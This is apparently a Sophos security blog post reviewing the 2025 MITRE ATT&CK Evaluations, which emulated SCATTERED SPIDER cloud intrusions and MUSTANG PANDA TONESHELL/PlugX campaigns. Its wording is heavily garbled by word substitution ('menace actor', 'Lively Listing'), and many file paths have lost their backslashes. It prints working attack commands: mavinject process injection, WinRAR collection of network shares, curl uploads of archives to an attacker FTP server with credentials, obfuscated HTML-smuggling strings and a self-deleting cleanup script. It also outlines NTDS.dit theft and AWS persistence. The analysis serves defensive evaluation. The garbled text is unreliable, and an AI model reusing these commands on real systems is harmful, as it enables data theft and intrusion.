Annually, a number of safety answer suppliers – together with Sophos – join MITRE’s ATT&CK Enterprise Evaluations, a full-scale cyber assault emulation masking a number of situations primarily based on real-world menace actors and their techniques, methods, and procedures (TTPs).
The analysis is designed to supply a practical (and clear – the outcomes are publicly out there) appraisal of safety options’ performances, primarily based on end-to-end assault chains which embrace preliminary entry, persistence, lateral motion, and impression. Emulations sometimes embrace a multi-device ‘buyer’ atmosphere, full with endpoints, servers, domain-joined gadgets, and Lively Listing-managed customers.
2025 marked the fifth 12 months of Sophos collaborating – and, as we did final 12 months, we wished to supply some perception into what this 12 months’s evaluation (which got here full with a number of Recreation of Thrones references) entailed, and to indicate how true to life it truly is. Specifically, we’ll dive into the realism of the tooling, nuances within the testing methodology, and Sophos’ safety and detection capabilities. Whereas we are able to’t cowl every part, as a result of sheer variety of steps in every situation, we’ll talk about a range, highlighting the depth and accuracy of the emulations.
For the 2025 analysis, MITRE chosen two menace classes: a cybercriminal menace actor primarily based on SCATTERED SPIDER (GOLD HARVEST), and a China-based menace actor primarily based on MUSTANG PANDA (BRONZE PRESIDENT). Each are important and outstanding threats. The previous, being predominantly financially motivated, is understood for extortion and ransomware, and has been linked to a number of high-profile assaults in recent times – together with a ransomware assault towards a UK retailer, a knowledge breach focusing on an Australian airline, and assaults towards giant US on line casino and resort operators. The latter menace actor is concentrated on espionage and knowledge theft, and has focused a number of authorities and non-government organizations throughout a number of nations since no less than 2012.
MITRE’s SCATTERED SPIDER emulation comprised one situation: a menace actor buying preliminary entry after which continuing alongside all the assault chain, with the added complexity of pivoting from an on-premises atmosphere to cloud infrastructure. The MUSTANG PANDA emulation, however, consisted of two separate sub-scenarios. The primary (dubbed ORPHEUS) concerned all the assault chain, whereas the second (PERSEUS) lined preliminary entry, assortment, and exfiltration. Every sub-scenario featured a definite malware household, each related to the real-world menace actor.
The primary situation concerned an emulated cybercriminal menace actor, primarily based on real-world menace intelligence regarding SCATTERED SPIDER. This situation lined all the assault chain, together with preliminary entry, discovery, lateral motion, credential entry, persistence, assortment, and exfiltration.
Notably, this situation concerned the menace actor transferring laterally from their preliminary compromise of an on-premise atmosphere to an Amazon Internet Companies (AWS)-hosted atmosphere. SCATTERED SPIDER is one in every of a restricted variety of cybercrime teams identified to focus on and modify cloud infrastructure, and which makes use of a large and adaptive collection of open supply and publicly out there instruments.
The TTPs chosen for the cybercriminal situation had been drawn from a variety of public reporting, offering MITRE with flexibility of their emulation of SCATTERED SPIDER and interpretation of this reporting. Apparently, the usage of stealer malware – beforehand noticed in SCATTERED SPIDER intrusions – was absent within the situation.
Preliminary entry
The menace actor started their assault by sending a spearphishing e-mail to the person tlannister, from the handle it@kingslanding-it[.]web. Researchers have beforehand noticed SCATTERED SPIDER impersonating focused organisations’ manufacturers in phishing campaigns, utilizing the e-mail handle format
As for the e-mail itself, it contained a hyperlink to a malicious AiTM website. The topic was “ACTION: SSO Updates Accomplished – Reauthentication Wanted,” possible designed to create a way of urgency, and to prime the recipient to simply accept the next authentication immediate on the AiTM website as legitimate.
When tlannister authenticated to the AiTM website, the menace actor obtained legitimate static credentials and Single Signal On (SSO) session cookies. Replaying the stolen cookies supplied entry to the SSO answer, with a legitimate account for the group.
Subsequent, the menace actor enrolled their system within the SSO answer (one thing that researchers have seen SCATTERED SPIDER do). They then efficiently linked to the host dragongate through Distant Desktop (RDP), and gained entry to Outlook Internet Entry (OWA), indicating a legitimate SSO session.
Determine 1: Sophos XDR detections exhibiting cookies stolen utilizing session replay getting used for authentication and system registration
Discovery
Through their RDP session on the dragongate host, the menace actor then executed a number of discovery instructions utilizing cmd.exe:
- whoami: returns lively person’s area and username
- ping google.com: checks exterior community connectivity
- wmic product get title, model: enumerates put in software program, together with safety merchandise; variations could point out patch ranges and attainable vulnerabilities
- nltest /dclist: lists Lively Listing (AD) area controllers
- nltest /domain_trusts: lists trusted AD domains
- ping redkeep.kingslanding.web: ‘redkeep’ is the area controller, recognized from itemizing Lively Listing area controllers
It’s value noting that a number of of those instructions had been additionally executed throughout official administrator exercise elsewhere on this situation. In themselves, these instructions didn’t essentially point out malicious exercise, however, in our evaluation warranted investigation nonetheless, owing to the context. For instance, some nltest instructions had been executed within the context of a PowerShell course of, run by a person logged in through RDP from an exterior IP handle, and had been instructions that had been not often executed on that system.
Subsequent, the menace actor downloaded the Lively Listing enumeration device ADExplorer from the Microsoft SysInternals website utilizing Firefox, then launched the device to discover administrator teams. SCATTERED SPIDER is identified to have downloaded ADExplorer, and different publicly out there instruments, from their unique supply websites.
Determine 2: The menace actor makes use of ADExplorer.exe to listing members of the Area Admins group
The menace actor proceeded to entry the Z: shared drive on a file server named CITADEL (this drive was already mapped for the tlannister person). Recordsdata opened by the menace actor included a community structure diagram.
Whereas there may be restricted public data on SCATTERED SPIDER’s use of shared drives, researchers have reported on the menace actor looking SharePoint cases. That being mentioned, its versatile techniques and tooling recommend that accessing shared drives is credible within the situation.
We additionally famous that the menace actor on this situation created an inbox rule to delete emails with the key phrase AirByte. Public reporting signifies that SCATTERED SPIDER has used numerous Extract, Remodel, Load (ETL) instruments, together with AirByte, to synchronize and exfiltrate knowledge from focused environments. Researchers have additionally discovered that the menace actor has anticipated future AirByte configuration modifications that might set off an investigation, and suppressed notification change alerts utilizing e-mail guidelines.
Lateral motion, persistence, and credential entry
The cookies beforehand stolen by the menace actor enabled them to entry the group’s SSO system because the person tlannister. This entry supplied the attacker with entry to built-in functions, together with the AWS console, with out requiring a brand new authentication occasion on the group’s id supplier platform.
We noticed that in AWS CloudTrail, an AWS safety monitoring and governance device, there was an AwsConsoleSignIn occasion, indicating {that a} person had assumed an SSO function through the Authentik SAML (Safety Assertion Markup Language) supplier – the open-source SSO system utilized by the focused group on this situation.
Determine 3: Sophos XDR (Taegis) detections for a person performing AWS discovery actions after single-factor authentication through SAML
There have been a number of suspicious points of this console login:
- A login through SAML, however with out multifactor authentication (MFA)
- A person login from a beforehand unseen IP handle
- A console login, instantly adopted by AWS cloud service discovery exercise
The attacker then enumerated a number of AWS providers – one thing SCATTERED SPIDER is identified to do – together with Billing and Value Administration (more likely to set up what sorts of providers the focused group was utilizing), Id and Entry Administration (IAM) customers & teams, S3 buckets, EC2 community data, and EC2 occasion data. This fast enumeration of AWS providers by a single person triggered a detection (AWS Console Enumeration Exercise).
Following this enumeration, the menace actor then started to remotely execute instructions. They obtain this utilizing AWS Methods Supervisor, which permits command execution on EC2 cases with the AWS Methods Supervisor Agent deployed.
Particularly, the menace actor ran the AWS Methods Supervisor doc AWS-RunPowerShellScript to execute a PowerShell command on a number of cases. AWS CloudTrail data SendCommand occasions from Methods Supervisor. Whereas parameters for SendCommand paperwork are redacted by default in AWS CloudTrail logs for safety causes, EDR telemetry can be utilized to find out the command executed. The focused cases for the PowerShell command had been the on-premise Home windows hosts, relatively than the Linux cloud occasion hosts. Nonetheless, it’s value noting that there was some crossover right here; the on-premises hosts had been truly cases in the identical AWS group because the cloud cases, which is an atypical atmosphere.
Subsequent, the menace actor ran the AWS Methods Supervisor doc AWS-GatherSoftwareInventory to gather detailed software program stock data from managed AWS EC2 cases – together with put in functions, processes, updates and patches. This data is beneficial to an attacker as it might inform them the place they’re more likely to discover data related to their aims. On this situation, the attacker was all in favour of techniques containing confidential enterprise data.
Whereas public reporting on SCATTERED SPIDER describes its use of AWS Methods Supervisor’s AWS-GatherSoftwareInventory doc to profile cloud occasion hosts, we’re not conscious of any protection regarding its use of SendCommand AWS-RunPowerShellScript for distant command execution on cloud occasion hosts. Nonetheless, there are reviews of SCATTERED SPIDER utilizing the equal Azure Run Command.
The menace actor then established persistent entry to AWS by creating a brand new IAM person ahightower, through AWS IAM CreateUser, and connected a person coverage to the brand new person through AWS IAM AttachUserPolicy.
This connected coverage supplied administrative privileges. Attaching an administrative coverage to a brand new AWS IAM person is uncommon, and subsequently warrants investigation. Researchers have noticed SCATTERED SPIDER creating AWS IAM customers with comparable naming conventions to present official customers, after which assigning entry keys to allow programmatic entry.
The attacker subsequent used AWS federation options to pivot from the AWS Command Line Interface (CLI) entry keys to AWS Console entry for the brand new person. This system is applied within the open-source AWS Consoler device, which SCATTERED SPIDER has used prior to now.
Determine 4: Sophos XDR (Taegis) detection for the menace actor utilizing AWS Federation options to create an interactive session
Subsequently, the attacker provisioned a brand new EC2 occasion named goldroad for distant entry. The Sophos EDR agent was robotically deployed to this new occasion utilizing a CloudFormation stack, offering visibility of the attacker’s exercise on their new bastion host.
The preliminary distant entry mechanism utilized by the menace actor was EC2 Serial Console with SSH (SCATTERED SPIDER has been noticed leveraging Azure’s serial console function for distant entry). EC2 Serial Console entry makes use of a digital serial port that’s unbiased of the occasion’s community entry, and which doesn’t require configuration of the digital personal cloud’s (VPC) safety teams. Serial console entry doesn’t generate customary distant entry community visitors.
Determine 5: Sophos XDR (Taegis) detection exhibiting an SSH public key being uploaded to an EC2 occasion for distant entry through Occasion Join
The menace actor then carried out discovery exercise to establish secrets and techniques offering entry to focused enterprise data, by invoking the AWS Secrets and techniques Supervisor ListSecrets command – once more, one thing that SCATTERED SPIDER has achieved prior to now.
We noticed calls to BatchGetSecretValue and GetSecretValue, with requestParameters indicating {that a} Gitlab Private Entry Token secret for the person atargaryen was the goal. The attacker decrypted this secret by calling DecryptValue.
Subsequent, the menace actor downloaded two instruments designed for secret discovery: trufflehog and jecretz. As beforehand famous, SCATTERED SPIDER usually downloads publicly out there and open-source instruments from their unique supply, together with these two.
trufflehog is a credential / secrets and techniques scanner that helps scanning on a lot of platforms. Right here, the menace actor executed it towards Gitlab, authenticated utilizing a Gitlab private entry token (PAT), possible acquired from AWS Secrets and techniques Supervisor.
jecretz is described as a “Jira Secrets and techniques Hunter,” designed to “discover credentials and delicate contents in Jira tickets.” Within the situation, the menace actor executed jecretz towards a Wekan Kanban occasion utilizing tlannister’s static credentials – possible obtained from the preliminary phishing assault.
The menace actor then put in the distant monitoring & administration device Tactical RMM on a number of on-premise hosts, utilizing AWS Methods Supervisor’s AWS-RunPowerShellScript doc. SCATTERED SPIDER is identified to make use of quite a lot of distant monitoring and administration instruments, together with the open-source Tactical RMM.
The URL for the Tactical RMM configuration impersonated the kingslanding area. Impersonating focused organizations is, as talked about beforehand, additionally a tactic that researchers have noticed SCATTERED SPIDER utilizing.
Determine 6: Sophos XDR detection exhibiting Tactical RMM set up through AWS Methods Supervisor doc AWS-RunPowerShellScript, with a configuration area kingslanding-hr[.]com
Assortment and exfiltration
In the direction of the tip of the situation, the menace actor ready to exfiltrate knowledge through the cloud infrastructure. They deployed the wstunnel device (downloaded from the device’s GitHub repository, once more per SCATTERED SPIDER’s documented behaviors) to their goldroad occasion.
wstunnel makes use of outbound WebSocket protocol visitors to bypass firewalls and proxies. AWS EC2 VPC (Digital Non-public Cloud) default safety teams permit all outbound visitors by default, however don’t permit distant inbound connections which can be obligatory for direct distant entry strategies like SSH or RDP. Using WebSockets for the tunnel subsequently doesn’t require extra VPC safety group configuration, avoiding logged occasions in AWS CloudTrail.
Determine 7: Sophos XDR (Taegis) course of telemetry exhibiting the wstunnel consumer course of utilizing WebSockets to hook up with a distant server
The menace actor used the wstunnel tunnel to hook up with their goldroad occasion through SSH, relatively than the EC2 serial console. Public reporting on SCATTERED SPIDER intrusions describes the usage of a number of SSH tunnelling instruments, together with OpenSSH and RevShell.
From the tunnelled SSH session, the menace actor executed the AirByte configuration utility abctl to find platform standing and credentials; as famous beforehand, SCATTERED SPIDER is understood to make use of AirByte and comparable instruments for exfiltration.
Utilizing AirByte, the menace actor staged information from the goal cloud-hosted Gitlab and Wekan techniques to an S3 bucket. As lined above, e-mail notifications of AirByte configuration modifications had been suppressed by an e-mail deletion rule beforehand configured by the menace actor.
The attacker then downloaded the CyberDuck file browser and switch utility (a device researchers have described SCATTERED SPIDER utilizing in real-world campaigns) to an on-premise host, utilizing Firefox, and transferred information from the staging S3 bucket within the focused group’s AWS account to an attacker-controlled S3 bucket in one other AWS account.
Determine 8: Sophos XDR (Taegis) detection for suspected knowledge exfiltration from S3, primarily based on fast retrieval of a number of objects
The second situation emulated a China-based menace actor, primarily based on real-world menace intelligence regarding MUSTANG PANDA (BRONZE PRESIDENT). There have been two distinct sub-scenarios inside this wider situation, masking three distinct assault instruments utilized by this menace actor.
The primary sub-scenario (steps 1-6), ORPHEUS, lined all the assault chain together with preliminary entry, discovery, lateral motion, credential entry, persistence, assortment, and exfiltration. The malware used within the ORPHEUS sub-scenario is similar to TONESHELL, a backdoor reported earlier in 2025, whereas the VSCode tunnel abuse resembled an strategy described in 2024, throughout a marketing campaign through which a menace actor focused authorities entities in Southeast Asia.
In contrast to earlier years, steps 7-9 of Situation 2 featured a separate sub-scenario (PERSEUS), masking preliminary entry, assortment, and exfiltration. The PERSEUS execution chain emulated the PlugX malware and the more moderen ‘SmugX’ (PlugX plus HTML smuggling) assault chains.
ORPHEUS (Steps 1-6)
Preliminary entry and protection evasion
The preliminary entry stage started with a malicious Workplace doc, despatched as an e-mail attachment. This doc (Strategic Competitors with Pentos – Assessing Braavos Competitiveness Past Essos.docx) contained an embedded hyperlink that led to obtain of the archive file 250325_Pentos_Board_minutes.rar.
This archive file contained a LNK file (Essos Competitiveness Transient.lnk) which executed the binary EssosUpdate.exe – a official Home windows utility (wsdebug_host.exe) that sideloaded a malicious DLL, wsdapi.dll. This DLL acted as a loader for the ORPHEUS payload.
EssosUpdate.exe then re-executed wsapi.dll utilizing regsvr.exe, with the command:
C:WindowsSystem32regsvr32.exe /s "C:UsershtargaryenDownloadswsdapi.dll"
regsvr32.exe spawned C:WindowsSystem32waitfor.exe Event183785251387 after which used mavinject to inject wsdapi.dll into waitfor.exe:
C:WindowsSystem32mavinject.exe 8344 /INJECTRUNNING "C:UsershtargaryenDownloadswsdapi.dll"
Based mostly on the assault chain, we assessed that this sub-scenario was emulating MUSTANG PANDA/BRONZE PRESIDENT and the TONESHELL malware. As an illustration, the execution of the LNK file appeared just like that described in some reporting, which particularly calls out that:
Mustang Panda employs DLL sideloading methods, sometimes bundling malicious instruments inside RAR archives paired with official, signed binaries.
LNK file lures and DLL sideloading have lengthy been in style methods related to MUSTANG PANDA. As an illustration, in 2022, Secureworks (now a Sophos firm) reported that:
The malware is embedded inside RAR archive information. Opening the archive on a Home windows laptop with default settings shows a Home windows shortcut (LNK) file.
To execute the malware, the recipient should click on the Home windows shortcut file. The shortcut executes a renamed official file contained within the eighth hidden folder. Alongside the official file is a malicious DLL and an encrypted payload file.
A big a part of this assault chain emulation gave the impression to be instantly linked to Pattern Micro’s report on TONESHELL. As an illustration, we noticed the next similarities:
- The identical sideload -> regsvr.32exe -> mavinject.exe -> waitfor.exe injection chain (waitfor.exe Event19030000000 was used within the real-world assault; waitfor.exe Event183785251387 within the emulation)
- Each samples applied customized exception handlers
- Each samples used the ws2_32 ship API for C2 communication
- Each samples decrypted and executed shellcode as soon as working of their goal course of.
Discovery
For the invention step, MITRE opted to solely execute a handful of instructions from the injected C2 course of (waitfor.exe).
netstat -anop tcp ipconfig /all mswin1.exe 10.55.4.0/24
These three discovery instructions had been possible supposed to signify how the adversary found the file servers/ area controller and all workstations on the atmosphere. In a real-world assault, we’d sometimes count on to see extra detailed enumeration occurring at this stage – though the paucity of instructions may have been a reference to MUSTANG PANDA’s stealth and evasive capabilities.
The utilization of mswin1.exe ( SharpNBTScan, a NetBIOS scanning device) on this step was just like the strategy described in Unit 42’s report on Stately Taurus. In that marketing campaign, the attacker used SharpNBTScan renamed as win1.exe.
Lateral motion, persistence, and credential entry
The ORPHEUS menace actor used PsExec for lateral motion, to drop and execute the script CodeHelper.bat. This batch file established a secondary C2 channel through a Visible Studio Code (VSCode) Tunnel.
VSCode abuse is a comparatively current method that researchers have beforehand attributed to MUSTANG PANDA. As an illustration, in September 2024, Unit 42 reported on the menace actor utilizing code tunnels for C2.
Lateral motion within the ORPHEUS situation occurred from the initially compromised endpoint to the area controller, utilizing the identical account. Whereas it’s attainable {that a} area admin account may very well be initially compromised, it’s considerably atypical to see the assault transfer from preliminary entry straight to a site controller, with none credential theft or privilege escalation. Nonetheless, this facet of the emulation could mirror the truth that MUSTANG PANDA’s lures are sometimes extremely focused (as an example, specializing in authorities officers).
As soon as the code tunnel was established, the ORPHEUS menace actor stole a replica of NTDS.dit utilizing vssadmin to create a shadow copy of the file, and cmd.exe to repeat it to the initially compromised machine. The SYSTEM registry hive was additionally dumped utilizing reg.exe, as this comprises the boot key wanted to decrypt NTDS.dit.
For persistence, the ORPHEUS menace actor created a code tunnel on the initially compromised machine by means of a scheduled process named AccessoryInputServices.
We noticed a number of similarities between the TTPs on this step and Unit 42’s reporting:
- startcode.bat was used within the real-world assault to execute the code tunnel; MITRE used CodeHelper.bat
- PsExec was used for lateral motion
- NTDS.dit dumping
- The same naming conference for the scheduled process title (WindowsEdgeUpdateServices within the real-world assault, AccessoryInputServices within the simulation)
Assortment and exfiltration
The ORPHEUS menace actor executed WinRAR by means of the code tunnel to gather delicate knowledge:
"C:Program FilesWinRARrar.exe" a -r -v250m -hpj5Tft5lLFFcQK -x*appdata -x*ProgramData* -x*Restoration* "-x*System Quantity Data*" -x*$RECYCLE.BIN* "-x*Program Recordsdata*" "-x*Program Recordsdata (x86)*" -x*Home windows* -x*Python312* -x*crash_dumps* -x*PerfLogs* -n@C:UsershtargaryenDownloadsfiles.txt C:WindowsTempA.rar 10.55.3.105A$*
The command executed right here is just like that described by Unit 42:
rar.exe a -r -v250m -x*appdata-n@1.txt .rar D$*
Each instructions learn the file assortment sample from a txt file, and goal the distant share drives of community hosts.
For exfiltration, a renamed model of curl was dropped and executed to exfiltrate the archive information to a distant FTP server.
"C:Program FilesMicrosoft VS Codeprpbg.dat.bak.1" -T "{C:home windowstempC.rar,C:home windowstempE.rar,C:home windowstempF.rar,C:home windowstempG.rar,C:home windowstempH.rar,C:home windowstempJ.rar}" ftp://ftp_user:Gracious-Coat@[IP]/do/ --ftp-create-dirs
This strategy is just like beforehand noticed MUSTANG PANDA habits:
- Renaming curl and dropping it to C:ProgramdataIDMlog.log
- Exfiltrating RAR archives of delicate knowledge to an attacker-controlled FTP server
PERSEUS (steps 7-9)
Steps 7-9 consisted of a separate sub-scenario (PERSEUS), the place we noticed preliminary entry once more on a brand new host – adopted by assortment, exfiltration, and indicator elimination.
Preliminary entry
The PERSEUS menace actor achieved preliminary entry utilizing a malicious hyperlink delivered through e-mail. This e-mail directed the person to an HTML smuggling net web page. HTML smuggling has gained reputation as a technique to evade network-based detections. Researchers have beforehand noticed MUSTANG PANDA utilizing HTML smuggling to ship PlugX malware (in a marketing campaign referred to as ‘SmugX’).
The HTML smuggling code utilized by MITRE (Determine 9) comprises a number of similarities to the instance within the Test Level article linked above.
Determine 9: HTML smuggling code used within the PERSEUS sub-scenario
Each implementations had been closely obfuscated and made use of the window.atob operate to obfuscate operate calls.
Moreover, each implementations hid the invocation of createObjectURL through the use of an identical obfuscated strings, which had been concatenated barely in another way. MITRE used ‘Y3JlYX’+’RlT2Jq’+’ZWN0VV’+’JM’, whereas MUSTANG PANDA used ‘Y3JlYXRl’ + ‘T2JqZWN’ + ‘0VVJM’. This string decodes to “createObjectURL”, utilized in HTML smuggling to create an object URL for the payload.
Within the PERSEUS sub-scenario, HTML smuggling led to the obtain of an MSI file named 2025p2.msi. When executed, this file put in an emulation of PlugX by means of sideloading and dynamic code execution.
Right here’s a short overview of the an infection chain:
- 2025p2.msi dropped gup.exe, WinGUpdate.dat (the PlugX payload) and libcurl.dll (the PlugX loader) to disk
- The msi set up then executed gup.exe which sideloaded libcurl.dll
- libcurl.dll loaded and decrypted WinGUpdate.dat, which led to execution of the PlugX payload
- The PlugX payload communicated with the attacker’s C2 server
- A decoy PDF (Assembly Invitation.pdf) opened and was exhibited to the person
- The PERSEUS menace actor established persistence by means of the creation of a run key (WinGupSvc).
As earlier than, this strategy comprises a number of similarities to that detailed in Test Level’s protection:
- Each MSI installers had been delivered through HTML smuggling
- Each installers executed a PlugX loader by means of sideloading
- Each loaders learn the ultimate RC4 encrypted payload from a .DAT file (knowledge.dat within the real-world assault, WinGUpdate.dat within the emulation)
- Each implementations offered the person with a decoy PDF doc
- Each implementations established persistence by means of a registry run key.
We additionally famous a disparity: the MITRE emulation used gup.exe and libcurl.dll for sideloading, whereas the real-world assault concerned robotaskbaricon.exe and RoboForm.dll. Nonetheless, whereas the emulation differed from the SmugX marketing campaign on this respect, we should always be aware that researchers have noticed MUSTANG PANDA utilizing gup.exe and libcurl.dll to execute Cobalt Strike.
Assortment and exfiltration
With the PlugX payload established, the emulation moved on to assortment and exfiltration. Right here, the PERSEUS menace actor used rar.exe to go looking and accumulate information primarily based on the next extensions: pdf, doc, ppt, xls, png, jpg and jpeg.
"C:Program FilesWinRARrar.exe" a -r -m5 -ibck -ed -v325m -hpI1HcgjY7bWRA8 -inul -ta202504230000000 C:UsersPublicDocumentsb44d0xUT5BLOi.rar "C:*.pdf" "C:*.doc*" "C:*.ppt*" "C:*.xls*" "C:customers*.png" "C:customers*.jpg" "C:customers*.jpeg"
The menace actor proceeded to invoke curl.exe to exfiltrate the collected information (as a .rar file named b44d0xUT5BLOi.rar) to their FTP server.
curl.exe -T C:UsersPublicDocumentsb44d0xUT5BLOi.rar ftp://ftp_user:Gracious-Coat@[IP]/dp/ --ftp-create-dirs
This section contained quite a few similarities to the TONESHELL emulation within the OPRHEUS situation: each WinRAR and curl had been used to gather and exfiltrate the delicate information, and the identical FTP server was used for exfiltration. Nonetheless, there have been additionally some variations. On this sub-scenario, information had been collected regionally, and the native curl.exe (C:WindowsSystem32curl.exe) binary was executed.
We don’t know why MITRE opted to retest utilizing curl.exe (albeit this time as a living-off-the-land binary, or LOLbin) and rar.exe for this section. As has been publicly reported, PlugX has native capabilities for assortment and exfiltration that will possible be extra evasive then executing LOLBINs already examined within the ORPHEUS sub-scenario.
It’s attainable that MITRE could have taken inspiration from a Pattern Micro report on MUSTANG PANDA, through which researchers described how PUBLOAD executed a really comparable curl command to exfiltrate knowledge to an attacker-controlled FTP server:
curl --progress-bar -C --T C:programdataIDM.RAR ftp:// : @
This report additionally refers to PLUGX executing rar.exe through cmd.exe with a really comparable assortment sample (though there isn’t a reference to curl.exe getting used for exfiltration):
"RAR.exe a -r -m3 -tk -ed -dh -v4500m -hp-ibck -ta -n*.doc* -n*.rtf* -n*.xls* -n*.pdf* -n*.ppt* -n*.jpg* -n*.cdr* -n*.dwg* -n*.png* -n*.psd* -n*.JPE* -n*.BMP* -n*.TIF* -n*.dib* " .RAR" " ""
Indicator elimination
Within the ultimate a part of the PERSEUS sub-scenario, the malware was uninstalled utilizing a self-clean up script which operates as follows:
First, gup.exe (PlugX) dropped del_WinGupSvc.bat.
Subsequent, the batch file executed with a self-deletion command to take away the batch script itself as soon as execution was full:
cmd /c "echo @echo off > C:UsersccoleAppDataLocalTempdel_WinGupSvc.bat && echo ping 127.0.0.1 -n 5 ^>nul >> C:UsersccoleAppDataLocalTempdel_WinGupSvc.bat && echo del %~f0 >> C:UsersccoleAppDataLocalTempdel_WinGupSvc.bat && C:UsersccoleAppDataLocalTempdel_WinGupSvc.bat"
The script uninstalled the persistence mechanism, the MSI bundle, and gup.exe:
reg delete "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun" /v "WinGupSvc" /f msiexec /uninstall "C:UsersccoleDownloads2025p2.msi" /quiet taskkill /f /im gup.exe
Right here’s what we noticed in Sophos XDR regarding this exercise:
Determine 10: Sophos XDR lineage exhibiting the noticed self-deletion section
This indicator elimination step emulates the documented self-delete command in PlugX (recognized as 0x1005). Its implementation is similar to the small print reported by Sekoia, the place, as a part of the self-delete course of, researchers noticed use of the batch script del_AsvastSvcpCP.bat.
2025 marked the fifth 12 months that Sophos has participated in MITRE ATT&CK Enterprise Evaluations. As in earlier years, the deal with end-to-end assault chains and realism has made the analysis a particularly worthwhile train in assessing our capabilities and people of different distributors. We additionally welcome MITRE’s emphasis on transparency.
Like every type of emulation, a lot of the worth of those evaluations comes from how correct and practical their situations are. As with the 2024 evaluations, we famous that in a number of, minor cases, MITRE’s situations deviated from what we find out about real-world assaults. In some instances, this will have been as a consequence of unavoidable constraints associated to growing and executing the situations. In others, it could have been the results of sure traits of the emulated menace actors. As an illustration, the MUSTANG PANDA menace actor, due to its nature and aims, is extra more likely to function in a managed, coordinated method. In distinction, SCATTERED SPIDER – believed to be extra of a unfastened, amorphous collective – has extra mutable and versatile TTPs, that means that MITRE maybe had extra flexibility when designing the situation. Regardless, in our evaluation, the extent of realism was excessive, and the general resemblance to identified campaigns and menace actors stays very robust – making this a useful train.
Clear, practical evaluations, through which a number of distributors take part, profit not solely distributors themselves, but additionally prospects, and, consequently, wider society. We sit up for persevering with to take part in these evaluations sooner or later, and to reporting our experiences and findings.
